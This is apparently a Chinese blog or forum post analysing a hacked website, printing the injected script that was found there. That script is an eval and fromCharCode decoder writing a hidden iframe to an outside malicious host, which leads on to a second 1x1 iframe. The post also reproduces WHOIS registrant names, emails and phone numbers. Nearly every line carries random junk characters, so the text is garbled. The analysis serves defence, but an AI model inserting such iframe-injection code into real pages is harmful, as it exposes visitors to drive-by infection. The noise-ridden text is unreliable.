[原创]一篇刚写的分析木马手记

首发在我的博客里面， _9z+xl  
N&W7g#F  
http://www.areway.cn/?p=175 k-$J #  
'uLYah  
,"T[#A~  
周末上线鸭子就Q我说他的站给挂了马，当时没太注意就直接打开了连接，截下了网页源码： ^C{?LH/2  
          nyPW6VQ0n  
<script>t=’60,105,102,114,97,109,101, 6/|"y  
32,115,114,99,61,104,116,116,112,58,47,47, 0"u=g)3  
102,114,101,101,46,117,45,117,117,117,46,99, -n6T^vf  
110,47,101,114,114,111,114,46,104,116,109, >yr3C  
32,119,105,100,116,104,61,49,48,48,32,104, .X6V>e)(3  
101,105,103,104,116,61,48,62,60,47,105,102, XK
yW  
114,97,109,101,62′; ?WrL<?r)}U  
t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script> inyS4tb  
                                                                                                  ?MJ5GVeH  
<script>t=’60,105,102,114,97,109,101,32,115, w)Y}hlcq  
114,99,61,104,116,116,112,58,47,47,102,114, 1<wolTf  
101,101,46,117,45,117,117,117,46,99,110,47, L$; gf_L  
101,114,114,111,114,46,104,116,109,32,119, d)v!U+-|'  
105,100,116,104,61,49,48,48,32,104,101,105, R)9FXz$).  
103,104,116,61,48,62,60,47,105,102,114,97, >V@,K z1  
109,101,62′;t=eval(’String.fromCharCode(’+t+’)'); 'V*8'?  
document.write(t);</script> ~tqNxlA  
                                                                                                  dkOERVRe  
<html xmlns=” oRl@AhS  
http://www.w3.org/1999/xhtml @Hst-H.l<l  
“> +/Vzw  
<head> C] |m|`  
<!– Published By Newasp.cc 2007-12-7-18:03:23 –> $)7Af6xD  
<meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ /> mCEWp  
<title>首页 - 爱生活家庭网 CdiL{zH\3  
                                                                                                                                                    [.4D<}e  
上面有一段 script的十进制加密字段，里面的大概内容是，把所有的字符放在函数t里面，最后用doucment.write(t)来把字符串写在网页里面。 V(n3W=#kky  
转换字符串后的大概内容是（谁点击后果自付）： eRIdN(pP  
<script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=……… $+HS^
m  
                                                                                                                                  4\2~wS
r  
查询玉米u-uuu.cn的详细信息： OC2%9Igx0  
Domain Name: u-uuu.cn Ijs=4f  
ROID: 20070901s10001s64972306-cn Nv\<>gA:  
Domain Status: ok GoG_4:^#h  
Registrant Organization: 王雷 $I90KQB\_  
Registrant Name: 王雷 _2Fa.gi  
Administrative Email: czlovexs@126.com f2{qj5 K  
Sponsoring Registrar: 北京万网志成科技有限公司 W7 9.,#  
Name Server:ns.yovole.com Bqb3[^;~  
Name Server:ns1.yovole.com M,N(be-  
Registration Date: 2007-09-01 17:54 $dHD  
Expiration Date: 2008-09-01 17:54
uszMzO~  
最后PING了一下地址 都没有什么…. ,9/s`o  
                                                                                                +F6R@@rWr  
上虚拟机里面继续分析，IE里面打开上面的连接…查看源代码…..直接又有嵌套. {>.qo<k  
<iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe> XOJ@-^BX  
<script language=”javascript” src=” L&~>(/*7U  
http://count43.51yes.com/click.aspx?id=4333375720&logo=6″></script r7N%onx  
> #>qA&*+{n  
这个玉米应该有可能是木马作者的： ,NQ>,}a0  
foafau.info的详细信息： x:IY6 l  
Access to INFO WHOIS information is provided to assist persons in u2Qs}FX  
determining the contents of a domain name registration record in the IR*:i{  
Afilias registry database. The data in this record is provided by xqaw00,s  
Afilias Limited for informational purposes only, and Afilias does not +4Lj}8,  
guarantee its accuracy.  This service is intended only for query-based p:8]jD@}%  
access. You agree that you will use this data only for lawful purposes )1]LoEdm`  
and that, under no circumstances will you use this data to: (a) allow, h3kBNBI )  
enable, or otherwise support the transmission by e-mail, telephone, or ,5Tw
5<S  
facsimile of mass unsolicited, commercial advertising or solicitations $a+)v#?,  
to entities other than the data recipient’s own existing customers; or x8*@<]!  
(b) enable high volume, automated, electronic processes that send & A@!g  
queries or data to the systems of Registry Operator, a Registrar, or 0qD.OF)8  
Afilias except as reasonably necessary to register domain names or .@]M'S^1  
modify existing registrations. All rights reserved. Afilias reserves ^b(>Bg)T  
the right to modify these terms at any time. By submitting this query, }@wXm  
you agree to abide by this policy. DR#[\RzNI  
Domain ID:D22418703-LRMS ]lzOz<0q  
Domain Name:FOAFAU.INFO
Z(fhH..T`  
Created On:20-Nov-2007 16:05:42 UTC 8^dsx1U#  
Last Updated On:20-Nov-2007 16:05:44 UTC z50f$!?  
Expiration Date:20-Nov-2008 16:05:42 UTC *g/@-6  
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS) 2E}^'o  
Status:CLIENT DELETE PROHIBITED =;HmU.Uek%  
Status:CLIENT RENEW PROHIBITED @5(HRd
 
Status:CLIENT TRANSFER PROHIBITED `pd1'5Hm  
Status:CLIENT UPDATE PROHIBITED ;V3d"@R,  
Status:TRANSFER PROHIBITED `o!a RX  
Registrant ID:GODA-040110615 +)K yG  
Registrant Name:liu hong {v}jV{'^um  
Registrant Organization: b1qli
5  
Registrant Street1:beijing jRIm_)  
Registrant Street2: ph=[|P)  
Registrant Street3: ;^:$O6J7T~  
Registrant City:beijing hk1jxnQh  
Registrant State/Province: Mt`XHXTp  
Registrant Postal Code:100000 t~"DQqE  
Registrant Country:CN f^X\N/  
Registrant Phone:+86.860108888777 pGGx.&5#82  
Registrant Phone Ext.: R|H_F#eVn}  
Registrant FAX: \:wLUGFl5  
Registrant FAX Ext.: \ g[A{  
Registrant Email:bbbshiji@163.com W'9=st'  
Admin ID:GODA-240110615 }\/f~?tEh  
Admin Name:liu hong 7?JcB?G4  
Admin Organization: }D eW2Jp  
Admin Street1:beijing *d/]-JN,K  
Admin Street2: H=k*;'  
Admin Street3: v;@-bED(Qs  
Admin City:beijing `+0)dTA(g$  
Admin State/Province: ;F<)BEXC<  
Admin Postal Code:100000 h8_~ OX  
Admin Country:CN ' ! ls"qo  
Admin Phone:+86.860108888777 Aw *:5I[  
Admin Phone Ext.: DY%#E9  
Admin FAX: c F(]`49(  
Admin FAX Ext.: }ZWeb
#\  
Admin Email:bbbshiji@163.com o(@F37r{?  
Billing ID:GODA-340110615 emI]'{_G  
Billing Name:liu hong 7eg//mL"6  
Billing Organization: 4';tMiz  
Billing Street1:beijing oxPb; %  
Billing Street2: RycO8z*p  
Billing Street3: 8W_X&X?Q  
Billing City:beijing |!{BjOAD'  
Billing State/Province: I"=XM   
Billing Postal Code:100000 /aB9pD+%  
Billing Country:CN ~ Qt$)  
Billing Phone:+86.860108888777 ~:srm#IX  
Billing Phone Ext.: cAc i2e  
Billing FAX: ~L'}!' &.  
Billing FAX Ext.: [2,u:0"  
Billing Email:bbbshiji@163.com jTx,5s-  
Tech ID:GODA-140110615 [Pt5c6L:  
Tech Name:liu hong V-w[\u  
Tech Organization: TY|]""3f9  
Tech Street1:beijing 1xo<V5  
Tech Street2: wFaWLC|&  
Tech Street3: N7xkkAS{  
Tech City:beijing :Y[r^=>  
Tech State/Province: Yg#)@L  
Tech Postal Code:100000 s"?&`S  
Tech Country:CN qEpP%p  
Tech Phone:+86.860108888777 IczEddt@'  
Tech Phone Ext.: d0 tN73(  
Tech FAX: `'[ 7M  
Tech FAX Ext.: `
v)-v<  
Tech Email:bbbshiji@163.com J)n g,i  
Name Server:NS27.DOMAINCONTROL.COM *{)![pDYd  
Name Server:NS28.DOMAINCONTROL.COM ~>)GW  
Name Server: \0pJ+@\T9  
Name Server: WiL~b =fT  
Name Server: 5aTyM_x  
Name Server: O,[aL;v  
Name Server: dR_hPBn/@  
Name Server: w`VmN}pR  
Name Server: .n`MPx'  
Name Server: k>Qr
14F  
Name Server: $sO}l  
Name Server: 7j&l2Z  
Name Server: P"u*bqk  
                                                                                                          }h>e=<  
接着下载每个文件里面的代码： w|PZSOJ  
一步一步看.. <96ih$5D1  
l(zkMR$b8  
hk&p+NV!  
6|LDb"Rvy  
zq]V6.]J  
b\?#O}  
都是十进制的代码，也懒得再分析了，有这个爱好的大家可以继续试试

看过了就是没看懂。。。

要是有全部 就好了 传上来